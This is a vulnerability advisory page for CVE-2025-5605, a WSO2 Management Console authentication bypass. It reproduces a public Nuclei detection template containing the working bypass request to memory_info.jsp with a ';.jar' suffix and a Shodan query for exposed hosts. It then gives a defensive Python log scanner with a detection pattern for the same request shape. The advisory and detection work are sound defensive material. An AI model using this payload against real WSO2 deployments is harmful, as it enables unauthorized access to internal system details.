CVE-2025-5605: WSO2 Management Console - Authentication Bypass

Date: 2025-08-01 | Affected software: WSO2 Management Console | PoC: public

Vulnerability description

An authentication bypass vulnerability exists in the Management Console of multiple WSO2 products. A malicious actor with access to the console can manipulate the request URI to bypass authentication and access certain restricted resources, resulting in partial information disclosure. The known exposure from this issue is limited to memory statistics. While the vulnerability does not allow full account compromise, it still enables unauthorized access to internal system details.

PoC code [public]

id: CVE-2025-5605

info:
  name: WSO2 Management Console - Authentication Bypass
  author: DhiyaneshDK
  severity: medium
  description: |
    An authentication bypass vulnerability exists in the Management Console of multiple WSO2 products. A malicious actor with access to the console can manipulate the request URI to bypass authentication and access certain restricted resources, resulting in partial information disclosure. The known exposure from this issue is limited to memory statistics. While the vulnerability does not allow full account compromise, it still enables unauthorized access to internal system details.
  impact: |
    Attackers can bypass authentication to access internal memory statistics, leading to partial information disclosure.
  reference:
    - https://blog.lexfo.fr/wso2.html
    - https://nvd.nist.gov/vuln/detail/CVE-2025-5605
    - https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2025/WSO2-2025-4115/
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:1398055326
  tags: cve,cve2025,wso2,auth-bypass

http:
  - raw:
      - |
        GET /carbon/server-admin/memory_info.jsp;.jar HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Memory Statistics'
          - 'Collection Usage'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a0d876cf7bf930abeeada3ce4399e109f84467bb94fd50d4249df5f99c879c3902207ec44cbaf90746443537f9fb9b2875b51b1e9eeed8495df3f1d09ad7ff337e4e:922c64590222798bb761d5b6d8e72950
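The template above tests whether a deployment is affected. From the defender's side, the same request shape is what you look for in access logs: a request under /carbon/ whose last path segment carries a ';' path parameter ending in a static-resource extension (the PoC uses ';.jar'), answered with a 200 where a login redirect would be expected. The following Python script is an added example written for this advisory page, not code from the Nuclei project or from WSO2. It assumes Apache/Tomcat Combined Log Format access logs; the log lines it scans are constructed samples, and the list of static extensions it treats as suspicious is an assumption that generalizes the ';.jar' case shown in the PoC.

```python
"""Flag CVE-2025-5605-style URI manipulation in web server access logs.

Added example for this advisory; not part of the Nuclei template or WSO2.
Assumes Combined Log Format; sample lines below are constructed, not real traffic.
"""
import re
from urllib.parse import urlsplit

# Combined Log Format: ip ident user [time] "METHOD target HTTP/x" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Management Console paths that should only be served to an authenticated session.
CONSOLE_PREFIX = "/carbon/"

# Path-parameter suffixes that make a JSP look like a static resource.
# ';.jar' is the variant in the PoC; the other extensions are an assumption.
STATIC_EXT_RE = re.compile(r';[^/]*\.(jar|js|css|png|gif|jpg|ico|html?)$', re.IGNORECASE)


def is_suspicious_target(target: str) -> bool:
    """True when a console request has a segment with a ';...<static-ext>' path parameter."""
    # urlsplit keeps ';params' inside .path (urlparse would split them off).
    path = urlsplit(target).path
    if not path.startswith(CONSOLE_PREFIX):
        return False
    return any(';' in seg and STATIC_EXT_RE.search(seg) for seg in path.split('/'))


def scan_log(lines):
    """Return (ip, target, status) for every request matching the bypass pattern.

    A 200 on a console JSP with no session is the strongest signal; other
    statuses (e.g. a 302 to the login page) are reported too so that blocked
    attempts against a patched host remain visible.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not Combined Log Format
        if is_suspicious_target(m['target']):
            hits.append((m['ip'], m['target'], int(m['status'])))
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Aug/2025:10:00:01 +0000] "GET /carbon/admin/login.jsp HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Aug/2025:10:00:02 +0000] "GET /carbon/server-admin/memory_info.jsp;.jar HTTP/1.1" 200 5120 "-" "curl/8.0"',
    '198.51.100.9 - - [01/Aug/2025:10:00:03 +0000] "GET /carbon/server-admin/memory_info.jsp;.JS HTTP/1.1" 302 0 "-" "curl/8.0"',
    '198.51.100.9 - - [01/Aug/2025:10:00:04 +0000] "GET /carbon/admin/js/main.js HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '192.0.2.4 - - [01/Aug/2025:10:00:05 +0000] "GET /services/;.jar HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, target, status in scan_log(SAMPLE_LOG):
        print(f"{ip} {status} {target}")
```

Run against the samples, only the two /carbon/ requests with a ';.<ext>' suffix are reported; the legitimate static file and the non-console path are ignored. The 302 hit is what a patched host returns, so a stream of 302s from one source is still worth an alert, while a 200 on memory_info.jsp indicates the disclosure the advisory describes actually occurred.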
